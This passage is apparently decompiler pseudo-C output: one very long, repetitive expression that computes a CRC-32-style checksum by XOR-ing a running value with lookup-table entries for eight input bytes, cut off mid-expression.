							_t27 = (((((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[7] & 0x000000ff ^ ((((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 